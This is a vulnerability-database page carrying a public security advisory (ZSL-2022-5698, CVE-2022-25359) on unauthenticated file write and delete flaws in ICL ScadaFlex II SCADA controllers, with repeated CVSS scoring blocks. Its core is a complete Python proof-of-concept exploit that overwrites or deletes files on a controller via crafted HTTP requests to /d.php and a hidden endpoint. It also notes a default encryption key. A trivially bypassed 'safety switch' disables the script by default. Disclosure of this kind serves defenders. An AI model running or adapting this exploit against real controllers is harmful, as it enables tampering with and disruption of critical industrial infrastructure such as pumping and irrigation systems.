Gjoko KrsticZSL-2022-5698ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 Remote File CRUD
9.1 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
9.6 High
AI Score
Confidence
High
6.4 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:N/I:P/A:P
0.034 Low
EPSS
Percentile
91.4%
Title: ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 Remote File CRUD
Advisory ID: ZSL-2022-5698
Type: Local/Remote
Impact: System Access, DoS, Cross-Site Scripting, Manipulation of Data
Risk: (4/5)
Release Date: 22.02.2022
Summary
Scadaflex II controllers are 100% web based for both configuration and user interface. No applications are required other than any standard web browser. They are easily supported by remote access over the Internet or a cellular link. Scadaflex II controllers support industry standard wired communications using Modbus, DF1, SNP, and Ethernet IP protocols along with Ethernet-Serial bridging for Modbus or any other protocol. Each Scadaflex II controller has both analog and digital, inputs and outputs, sufficient for pumping stations, irrigation controls, and other similar process monitoring and control applications. They can also serve as communications concentrators and protocol converters that enhance the operation of existing PLCs and process equipment.
Description
The SCADA controller is vulnerable to unauthenticated file write/overwrite and delete vulnerability. This allows an attacker to execute critical file CRUD operations on the device that can potentially allow system access and impact availability.
Vendor
Industrial Control Links, Inc. - <http://www.iclinks.com>
Affected Version
SW: 1.03.07 (build 317), WebLib: 1.24
SW: 1.02.20 (build 286), WebLib: 1.24
SW: 1.02.15 (build 286), WebLib: 1.22
SW: 1.02.01 (build 229), WebLib: 1.16
SW: 1.01.14 (build 172), WebLib: 1.14
SW: 1.01.01 (build 2149), WebLib: 1.13
Tested On
SCADA HTTP Server
Vendor Status
[06.11.2021] Vulnerability discovered.
[16.01.2022] Vendor contacted.
[21.02.2022] No response from the vendor.
[22.02.2022] Public security advisory released.
PoC
Credits
Vulnerability discovered by Gjoko Krstic - <[email protected]>
References
[1] <https://vulners.com/cve/CVE-2022-25359>
[2] <https://nvd.nist.gov/vuln/detail/CVE-2022-25359>
[3] <https://packetstormsecurity.com/files/166103>
[4] <https://cxsecurity.com/issue/WLB-2022020117>
[5] <https://exchange.xforce.ibmcloud.com/vulnerabilities/220156>
[6] <https://vulners.com/zeroscience/ZSL-2022-5698>
[7] <https://www.exploit-db.com/exploits/50783>
[8] <https://www.cisa.gov/uscert/ncas/bulletins/sb22-059>
[9] <https://www.cisa.gov/news-events/ics-advisories/icsa-23-096-01>
[10] <https://industrialcyber.co/cisa/string-of-ics-vulnerabilities-detected-in-hardware-deployed-across-critical-infrastructure-sectors/>
Changelog
[22.02.2022] - Initial release
[23.02.2022] - Added reference [5], [6] and [7]
[05.03.2022] - Added reference [8]
[10.04.2023] - Added reference [9]
[28.03.2024] - Added reference [10]
Contact
Zero Science Lab
Web: <https://www.zeroscience.mk>
e-mail: [email protected]
<html><body><p>#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 Remote File CRUD
#
#
# Vendor: Industrial Control Links, Inc.
# Product web page: http://www.iclinks.com
# Product datasheet: http://files.iclinks.com/datasheets/Scadaflex%20II/Scadaflex%20SC-1%20&%20SC-2_A1_compressed.pdf
# Affected version: SW: 1.03.07 (build 317), WebLib: 1.24
# SW: 1.02.20 (build 286), WebLib: 1.24
# SW: 1.02.15 (build 286), WebLib: 1.22
# SW: 1.02.01 (build 229), WebLib: 1.16
# SW: 1.01.14 (build 172), WebLib: 1.14
# SW: 1.01.01 (build 2149), WebLib: 1.13
#
#
# Summary: Scadaflex II controllers are 100% web based
# for both configuration and user interface. No applications
# are required other than any standard web browser. They
# are easily supported by remote access over the Internet
# or a cellular link. Scadaflex II controllers support
# industry standard wired communications using Modbus,
# DF1, SNP, and Ethernet IP protocols along with Ethernet-Serial
# bridging for Modbus or any other protocol. Each Scadaflex
# II controller has both analog and digital, inputs and
# outputs, sufficient for pumping stations, irrigation
# controls, and other similar process monitoring and control
# applications. They can also serve as communications
# concentrators and protocol converters that enhance the
# operation of existing PLCs and process equipment.
#
# Desc: The SCADA controller is vulnerable to unauthenticated
# file write/overwrite and delete vulnerability. This allows
# an attacker to execute critical file CRUD operations on the
# device that can potentially allow system access and impact
# availability.
#
# Tested on: SCADA HTTP Server
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2022-5698
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5698.php
#
# CVE ID: CVE-2022-25359
# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25359
#
#
# 06.11.2021
#
import time,sys
import requests
import datetime
import showtime
# Default
# AES Encryption Key = 'ABCD1234abcd:ICL'
def bann():
print('''
----------------------------------------------------------
) ) ) ) ) )
( ( ( ( ( (
) ) ) ) ) )
(~~~~~~~~~) (~~~~~~~~~)
| t00t | | w00t |
| | | |
I _._ I _._
I /' `\\ I /' `\\
I | M | I | J |
f | |~~~~~~~~~~~~~~| f | |~~~~~~~~~~~~~~|
.' | ||~~~~~~~~| | .' | | |~~~~~~~~| |
/'______|___||__###___|____|/'_______|____|_|__###___|___|
ScadaFlex II SCADA Controllers
Remote write/delete PoC
ZSL-2022-5698
----------------------------------------------------------
''')
def safe(*trigger, ):
return True # |-| Safety Switch
def choice(n):
try:
if n == 1:
overwrite(controllerip = sys.argv[1], filepos = int(sys.argv[3], base = 10))
elif n == 2:
delete(controllerip = sys.argv[1], filepos = int(sys.argv[2], base = 10))
else:
print('Usage (Upload): ./sflex.py [IP] [Local file] [File position number]')
print('Usage (Delete): ./sflex.py [IP] [File position number]')
raise SystemExit('t00t')
except Exception as tip:
raise SystemExit(tip)
def jump():
choice(1) if len(sys.argv) == 4 else next
choice(2) if len(sys.argv) == 3 else next
def overwrite(controllerip, filepos):
print('Starting script at', start)
localfile = sys.argv[2]
with open(localfile, 'rb') as opener:
scadaurl = 'http://'
scadaurl += controllerip
scadaurl += '/d.php?N'
scadaurl += str(filepos)
scadaurl += ',73,'
scadaurl += opener.name
scadaurl += '~'
scadaurl += str(int(time.time()))
see = requests.post(scadaurl, files = {'upload' : opener})
if '100' in see.text:
print('File uploaded in {} directory at position {}.'.format('l', filepos))
print('URL: http://' +controllerip+ '/l/' +localfile)
else:
print("- controller webserver error.")
exit()
def delete(controllerip, filepos):
print('Starting script at', start)
exit(42) if isinstance(filepos, str) else next
scadaurl = 'http://'
scadaurl += controllerip
scadaurl += '/rW12IcL_Dat_N'
scadaurl += str(filepos)
scadaurl += ',0=1~'
scadaurl += str(int(time.time()))
see = requests.get(scadaurl)
check = '\x72\x57' #|
check += '\x31\x32' #|
check += '\x49\x63' #|
check += '\x4c\x5f' #|
check += '\x44\x61' #|
check += '\x74\x5f' #|
check += '\x4e'# o' #|
check += str(filepos)#|
check += '\x2c\x30' #|
check += '\x09\x52' #|
if check in see.text:
print('File at position {} deleted.'.format(filepos))
else:
print('- controller webserver error.')
exit()
def main():
if safe(True):
print('Careful...\nSafety: ON')
exit(17)
else:
print('Safety: OFF', end = '')
global start
start = datetime.datetime.now()
start = start.strftime('%d.%m.%Y %H:%M:%S')
bann(), jump(), choice(1959)
if __name__ == "__main__":
main()
</p></body></html>Related
9.1 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
9.6 High
AI Score
Confidence
High
6.4 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:N/I:P/A:P
0.034 Low
EPSS
Percentile
91.4%